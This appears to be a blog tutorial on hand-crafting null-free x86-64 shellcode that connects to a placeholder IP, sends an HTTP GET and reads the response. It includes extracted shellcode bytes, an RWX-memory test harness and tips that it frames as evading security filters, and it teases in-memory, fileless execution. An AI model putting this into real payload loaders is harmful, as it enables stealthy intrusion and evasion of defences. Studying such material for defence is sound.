Crafting a 232-Bytes HTTP Shellcode

To continue, we might consider using assembly code to further our goals. We may think about things like inline assembly in the C code. No! What about shellcode? I think it’s very amazing to convert our assembly code to shellcode. But everything will not be so simple and, especially for more complex code, we may need to modify the assembly code so that the shellcode can perform correctly.

-> but not <-

Have you tried to derive shellcode from assembly code? Or rather, have you tried to convert assembly code to shellcode? It’s not just copying the byte codes of the object code from something like objdump! If you do this, you will see that your shellcode may not act properly. In principle, we can always recover assembly from shellcode, but not the other way around. Honestly, we can derive shellcode from assembly, but it may not work as expected without any modification. For example, let’s convert the previously written assembly code to shellcode and execute it. First, let’s disassemble it with objdump. The result is something like this (for some IP address other than 1.2.3.4):

# objdump -d dl.o

dl.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:   48 c7 c0 29 00 00 00    mov    $0x29,%rax
   7:   48 c7 c7 02 00 00 00    mov    $0x2,%rdi
   e:   48 c7 c6 01 00 00 00    mov    $0x1,%rsi
  15:   48 c7 c2 06 00 00 00    mov    $0x6,%rdx
  1c:   0f 05                   syscall 
  1e:   48 85 c0                test   %rax,%rax
  21:   78 71                   js     94 <_exit>
  23:   48 89 c7                mov    %rax,%rdi
  26:   48 c7 c0 2a 00 00 00    mov    $0x2a,%rax
  2d:   48 8d 35 00 00 00 00    lea    0x0(%rip),%rsi        # 34 <_start+0x34>
  34:   48 c7 c2 10 00 00 00    mov    $0x10,%rdx
  3b:   0f 05                   syscall 
  3d:   48 85 c0                test   %rax,%rax
  40:   78 52                   js     94 <_exit>
  42:   48 c7 c0 2c 00 00 00    mov    $0x2c,%rax
  49:   48 8d 35 00 00 00 00    lea    0x0(%rip),%rsi        # 50 <_start+0x50>
  50:   48 c7 c2 00 10 00 00    mov    $0x1000,%rdx
  57:   0f 05                   syscall 
  59:   48 85 c0                test   %rax,%rax
  5c:   78 36                   js     94 <_exit>
  5e:   48 c7 c0 2d 00 00 00    mov    $0x2d,%rax
  65:   48 8d 35 00 00 00 00    lea    0x0(%rip),%rsi        # 6c <_start+0x6c>
  6c:   48 c7 c2 00 10 00 00    mov    $0x1000,%rdx
  73:   0f 05                   syscall 
  75:   48 85 c0                test   %rax,%rax
  78:   7e 1a                   jle    94 <_exit>
  7a:   48 89 c2                mov    %rax,%rdx
  7d:   48 c7 c0 01 00 00 00    mov    $0x1,%rax
  84:   48 c7 c7 01 00 00 00    mov    $0x1,%rdi
  8b:   48 8d 35 00 00 00 00    lea    0x0(%rip),%rsi        # 92 <_start+0x92>
  92:   0f 05                   syscall 

0000000000000094 <_exit>:
  94:   48 c7 c0 3c 00 00 00    mov    $0x3c,%rax
  9b:   48 31 ff                xor    %rdi,%rdi
  9e:   0f 05                   syscall
Bash

And, we can use byte codes to generate our shellcode:

# objdump -d dl.o | grep -Po '\s\K[a-f0-9]{2}(?=\s)' | sed 's/^/\\x/g' | perl -pe 's/\r?\n//' | sed 's/$/\n/'

\x48\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48\xc7\xc2\x06\x00\x00\x00\x0f\x05\x48\x85\xc0\x78\x71\x94\x48\x89\xc7\x48\xc7\xc0\x2a\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x34\x48\xc7\xc2\x10\x00\x00\x00\x0f\x05\x48\x85\xc0\x78\x52\x94\x48\xc7\xc0\x2c\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x50\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\x85\xc0\x78\x36\x94\x48\xc7\xc0\x2d\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x6c\x48\xc7\xc2\x00\x10\x00\x00\x0f\x05\x48\x85\xc0\x7e\x1a\x94\x48\x89\xc2\x48\xc7\xc0\x01\x00\x00\x00\x48\xc7\xc7\x01\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x92\x0f\x05\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31\xff\x0f\x05
Bash

Now, let’s execute the shellcode to see if it works correctly. We can test that with a simple C program:

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/*
 * Test harness for the shellcode: copies the bytes into an anonymous
 * readable/writable/executable mapping and calls them as a function.
 * Returns 1 if the mapping cannot be created, 0 if the call returns.
 */
int main(int argc, char **argv) {
    /* Raw bytes to run; sizeof(code) also counts the literal's trailing NUL. */
    unsigned char code[]=
    "\x48\xc7\xc0\x29\x00\x00\x00\x48\xc7\xc7\x02"
    "\x00\x00\x00\x48\xc7\xc6\x01\x00\x00\x00\x48"
    "\xc7\xc2\x06\x00\x00\x00\x0f\x05\x48\x85\xc0"
    "\x78\x71\x94\x48\x89\xc7\x48\xc7\xc0\x2a\x00"
    "\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x34\x48"
    "\xc7\xc2\x10\x00\x00\x00\x0f\x05\x48\x85\xc0"
    "\x78\x52\x94\x48\xc7\xc0\x2c\x00\x00\x00\x48"
    "\x8d\x35\x00\x00\x00\x00\x50\x48\xc7\xc2\x00"
    "\x10\x00\x00\x0f\x05\x48\x85\xc0\x78\x36\x94"
    "\x48\xc7\xc0\x2d\x00\x00\x00\x48\x8d\x35\x00"
    "\x00\x00\x00\x6c\x48\xc7\xc2\x00\x10\x00\x00"
    "\x0f\x05\x48\x85\xc0\x7e\x1a\x94\x48\x89\xc2"
    "\x48\xc7\xc0\x01\x00\x00\x00\x48\xc7\xc7\x01"
    "\x00\x00\x00\x48\x8d\x35\x00\x00\x00\x00\x92"
    "\x0f\x05\x48\xc7\xc0\x3c\x00\x00\x00\x48\x31"
    "\xff\x0f\x05";
    const size_t code_len = sizeof(code);
    void *region;
    void (*entry)();

    /* Private anonymous mapping that is readable, writable and executable. */
    region = mmap(NULL, code_len, PROT_READ | PROT_WRITE | PROT_EXEC,
                  MAP_ANON | MAP_PRIVATE, -1, 0);
    if (region == MAP_FAILED) {
        perror("mmap");
        return 1;
    }

    /* The array itself is never called; only its copy in the mapping is. */
    memcpy(region, code, code_len);

    entry = (void(*)())region;
    entry();

    return 0;
}
C

Compile it statically, with the stack protector disabled and an executable stack:

# gcc --static -fno-stack-protector -z execstack test_shell.c -o test_shell
Bash

If we execute the compiled program, we see that it does not work as expected (it may stop with a segmentation fault, issue the wrong syscalls, etc.):

# ./test_shell
Segmentation fault (core dumped)

# strace ./test_shell
execve("./test_shell", ["./test_shell"], 0x7ffc1ac95500 /* 19 vars */) = 0
arch_prctl(0x3001 /* ARCH_??? */, 0x7ffc8d4c7890) = -1 EINVAL (Invalid argument)
brk(NULL)                               = 0x1a2a000
brk(0x1a2adc0)                          = 0x1a2adc0
arch_prctl(ARCH_SET_FS, 0x1a2a3c0)      = 0
set_tid_address(0x1a2a690)              = 1338816
set_robust_list(0x1a2a6a0, 24)          = 0
rseq(0x1a2ad60, 0x20, 0, 0x53053053)    = 0
uname({sysname="Linux", nodename="XXXXXXXX", ...}) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
readlink("/proc/self/exe", "/home/XXX/XXXXX/shell/test_shell", 4096) = 25
getrandom("\xb4\xab\xfc\x2d\x89\x59\x51\x89", 8, GRND_NONBLOCK) = 8
brk(0x1a4bdc0)                          = 0x1a4bdc0
brk(0x1a4c000)                          = 0x1a4c000
mprotect(0x4c1000, 16384, PROT_READ)    = 0
mmap(NULL, 169, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f740107d000
socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
getrusage(0x8d4c7638 /* RUSAGE_??? */, 0x7f740107d035) = -1 EINVAL (Invalid argument)
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xffffffffffffffea} ---
+++ killed by SIGSEGV (core dumped) +++
Segmentation fault (core dumped)
Bash

So, what could be wrong with that?!

Null Bytes

Again, if we look at the shellcode carefully, we will see some bytes like 0x00. These bytes are known as null bytes. A null byte, represented as \0 in programming, is a character with an ASCII value of zero. It is often used to signify the end of a string in languages like C and C++. This special character plays a crucial role in string manipulation and memory management, marking the termination point of a string so that functions know where the string ends. The presence of null bytes in shellcode can cause significant issues:

  • Premature Termination: Many functions that handle strings, such as strcpy in C, treat the null byte as the end of the string. If a shellcode contains null bytes, these functions may terminate the copy operation prematurely, leading to incomplete execution of the shellcode.
  • Execution Failures: Shellcodes are often injected into memory spaces where they need to be executed without interruption. Null bytes can disrupt this process, causing the shellcode to fail or behave unpredictably.
  • Detection and Prevention: Security mechanisms may detect null bytes as anomalies, flagging the shellcode as malicious. This can lead to the shellcode being blocked or removed before it can execute.

Preventing null bytes in shellcodes is essential for several reasons:

  • Ensuring Complete Execution: By avoiding null bytes, we ensure that the entire shellcode is copied and executed as intended. This is crucial for the success of the exploit.
  • Bypassing Security Filters: Many security systems and filters are designed to detect and block shellcodes containing null bytes. Crafting shellcodes without null bytes helps in evading these defenses.
  • Maintaining Stealth: Null-free shellcodes are less likely to be detected by security mechanisms, allowing the exploit to proceed without raising alarms.

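For example, null bytes in our shellcode can lead to a segmentation fault. (To be precise about the test above: the C program copies the bytes with memcpy, so nothing is truncated there. The strace output shows that the crash comes from the extraction step. The grep pattern also captured the jump targets and comment offsets of the objdump listing, i.e. the stray \x94, \x34, \x50, \x6c and \x92 bytes, and the lea displacements are unresolved zeros. Null bytes become a problem as soon as the shellcode passes through string-handling code.) In general, this can have various causes, including: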

  • String Termination: As I said before, in C, null bytes (\0) are used to terminate strings. If the shellcode is treated as a string, the presence of null bytes can cause it to be truncated, leading to incomplete execution and potential segmentation faults.
  • Memory Misalignment: Null bytes can cause memory misalignment issues. If the shellcode is not properly aligned in memory, it can lead to invalid memory access, resulting in segmentation faults.
  • Null Pointer Dereferencing: If the shellcode inadvertently sets a pointer to NULL and then tries to dereference it, this will cause a segmentation fault because the program is trying to access an invalid memory location.
  • System Call Arguments: Null bytes in the shellcode might affect the arguments passed to system calls. If a system call receives an unexpected null byte, it might interpret the arguments incorrectly, leading to invalid operations and segmentation faults.

So it seems that the presence of null bytes makes our shellcode not work properly, and we cannot use it to advance our goals (even though the assembly code works properly). So, let’s see whether we can make our shellcode null-free or not.

Null-free shellcode

I am determined to make the shellcode null-free, and I should say, I’m not bored of explaining everything, and in my opinion, everyone who reads this can understand it completely (otherwise this is the wrong place for them 😀 ).

Good! You have read this and checked the code carefully. As you know, there is some data in the .data section that is used in the .text section of the code (like the sockaddr structure). For example, take a look at the following code:

lea sockaddr(%rip), %rsi  # %rsi = address of sockaddr, computed relative to %rip

Its counterpart in the disassembled code is:

lea 0x0(%rip),%rsi

As you know, the instruction computes the address of the sockaddr structure, which is defined in the .data section, relative to the current instruction pointer, and then stores this address in the %rsi register. So, what is 0x0(%rip)? Taken literally, it means the address is exactly the same as the current value of rip. That is just a placeholder 😀 and it is totally normal: dl.o is an unlinked object file, so the displacement stays zero until the linker resolves the address of sockaddr. Obviously, the assembler alone cannot resolve the sockaddr address, and copying these bytes verbatim yields a wrong address. So, the technique I will use for this challenge is to remove the .data section and bring everything into the .text section by building the data on the stack.
The sockaddr structure represents an IPv4 socket address, which includes the address family (.word 2, i.e. AF_INET for IPv4), the port number (.word 0x5000, i.e. port 80 in network byte order), the IP address (.byte 1, 2, 3, 4 in our example) and padding to make the structure 16 bytes.
As I said above, we need 16 bytes to store the sockaddr structure. So if we want to use the stack to do the job, we need to allocate 16 bytes on the stack:

sub $16, %rsp  # reserve 16 bytes on the stack for the sockaddr structure

Now, we should set the address family (2). There are two ways to do this:

# Load the address family (2) through the stack so that no zero byte is encoded.
push $2          # in 64-bit mode this pushes 8 bytes
pop %rax         # pop all 8 bytes back, leaving %rsp where it was; %ax = 2
mov %ax, (%rsp)  # store the 16-bit family at the top of the stack (%ax, not $ax)

And:

mov $0x2, %ax    # 16-bit immediate 0x0002: its high byte is encoded as a null byte
mov %ax, (%rsp)  # store the address family at the top of the stack

I choose the first one, because the second may create a null byte. You can test it 😀
The last instruction moves the value in ax(which is 2) to the memory location pointed to by rsp(the top of the stack).

For port number:

mov $0x1001, %ax  # start from an immediate that contains no zero byte
shl $2, %ax       # 0x1001 << 2 = 0x4004
add $0x0ffc, %ax  # 0x4004 + 0x0ffc = 0x5000
mov %ax, 2(%rsp)  # store the port word at offset 2 of the structure

Or simply:

mov $0x5000, %ax  # the low byte of this immediate is zero, i.e. a null byte in the encoding
mov %ax, 2(%rsp)  # store the port word at offset 2 of the structure

But I certainly choose the first one, and you know why 😀

For IP address:

# The x86 is little endian: the low byte of %ax is stored first.
mov $0x0201, %ax  # stored as bytes 01 02 -> first two octets "1.2"
mov %ax, 4(%rsp)
mov $0x0403, %ax  # stored as bytes 03 04 -> last two octets "3.4" (0x0304 would give "4.3")
mov %ax, 6(%rsp)

The second instruction moves this value into the memory location 4 bytes above the top of the stack, and the fourth does the same at offset 6.
Or we can load the whole address at once:

mov $0x04030201, %eax  # stored as bytes 01 02 03 04 (little endian) -> 1.2.3.4
mov %eax, 4(%rsp)      # write all four address bytes at offset 4 of the structure

And let’s zero out the remaining bytes:

xor %eax, %eax     # %eax = 0 without encoding a zero immediate
mov %ax, 8(%rsp)   # clear the padding at offsets 8..15, two bytes at a time
mov %ax, 10(%rsp)
mov %ax, 12(%rsp)
mov %ax, 14(%rsp)

That’s it for the sockaddr 🙂 The same approach is used to set the address length (16) for the connect syscall:

# connect: syscall number 42 (0x2a).
# NOTE(review): %rdi is assumed to still hold the socket descriptor; it is not set in this snippet.
xor %eax, %eax  # clear %eax so that only the low byte has to be loaded
mov $42, %al    # syscall number, loaded as a single byte to avoid zero bytes
mov %rsp, %rsi  # second argument: pointer to the structure built on the stack
push $16        # third argument: 16, the size of the structure,
pop %rdx        # loaded through the stack instead of a 32-bit immediate
syscall

We have another .data section that includes the url, the path of the remote file, the HTTP request, and the IP address. Ignore everything but http_request. We should give it the same treatment we gave to sockaddr.
Consider the “GET /f HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: close\r\n\r\n” request line and headers (for simplicity I have removed some headers and changed /file.txt to /f). We can build the request easily on the stack:

sub $64, %rsp

# "GET /f HTTP/1.1\r\nHost: 1.2.3.4\r\nConnection: close\r\n\r\n"
# Built back to front, 8 bytes at a time. Each constant is little endian, so
# its lowest byte is the first character in memory. Extra spaces pad the text
# to a multiple of 8 bytes without introducing zero bytes.
# NOTE(review): only offsets 0..55 are written here; bytes 56..63 of the
# reserved area keep whatever was on the stack.
mov $0x0a0d0a0d65736f6c, %rax  # "lose\r\n\r\n"
mov %rax, 48(%rsp)
mov $0x632020203a6e6f69, %rax  # "ion:   c"
mov %rax, 40(%rsp)
mov $0x7463656e6e6f430a, %rax  # "\nConnect"
mov %rax, 32(%rsp)
mov $0x0d342e332e322e31, %rax  # "1.2.3.4\r"
mov %rax, 24(%rsp)
mov $0x203a74736f480a0d, %rax  # "\r\nHost: "
mov %rax, 16(%rsp)
mov $0x312e312f50545448, %rax  # "HTTP/1.1"
mov %rax, 8(%rsp)
mov $0x2020662f20544547, %rax  # "GET /f  "
mov %rax, 0(%rsp)

Now, continue to use that in our sendto syscall:

# sendto: syscall number 44 (0x2c).
# NOTE(review): %rdi is assumed to still hold the socket descriptor; it is not set in this snippet.
xor %eax, %eax
mov $44, %al    # syscall number, loaded as a single byte to avoid zero bytes
mov %rsp, %rsi  # second argument: the request text built on the stack
push $64        # third argument: number of bytes to send
pop %rdx        # NOTE(review): the snippet that builds the request writes only 56 bytes; confirm 64 is intended
xor %r10,%r10   # fourth argument = 0
xor %r8,%r8     # fifth argument = 0 (NULL)
xor %r9,%r9     # sixth argument = 0
syscall

add $64, %rsp  # Clean up the stack

Here, we used the data built on the stack for the second argument (%rsi) of the sendto syscall. The length of the buffer is 64 as the third argument (%rdx). The rest of the arguments (flags = 0, destination address = NULL and address length = 0) are set with xor. Note that we must set these arguments explicitly; otherwise the registers would still hold whatever values were left in them, and the kernel would interpret those leftovers as the flags and the destination address.

Finally, for the recvfrom syscall:

# recvfrom: syscall number 45 (0x2d).
# NOTE(review): %rdi, %r8 and %r9 are not set in this snippet; they are assumed to carry over from earlier code.
xor %eax, %eax
mov $45, %al      # syscall number, loaded as a single byte to avoid zero bytes
mov %rsp, %rsi    # second argument: receive buffer starts at the current top of the stack
xor %rdx, %rdx
mov $0x101, %rdx  # build the buffer size 0x4000 (16384) from smaller pieces
shl $4, %rdx      # 0x101 << 4 = 0x1010
shl $2, %rdx      # 0x1010 << 2 = 0x4040
sub $0x40, %rdx   # 0x4040 - 0x40 = 0x4000
xor %r10,%r10     # fourth argument = 0
syscall

The buffer is on the stack, passed as the second argument (%rsi), which points to %rsp. The third argument is the buffer size, which I set to 16384 (0x101 shifted left by 6 bits is 0x4040; minus 0x40 gives 0x4000).

Now, the party is over 😀 and if you check for null bytes in the shellcode you may still see some, coming only from the 0x101 immediate, which is not important (of course you can remove them by using some other arithmetic to set the third argument of the recvfrom syscall, but it’s up to you 😀 ).

The code was pushed here (but for a different IP address, not 1.2.3.4).

And then…?

Don’t keep asking “then what, then what…”. But what do you think: what if we could load and execute this shellcode directly in memory, without touching the disk? 😀

Leave a Reply

Your email address will not be published. Required fields are marked *

2 + 10 =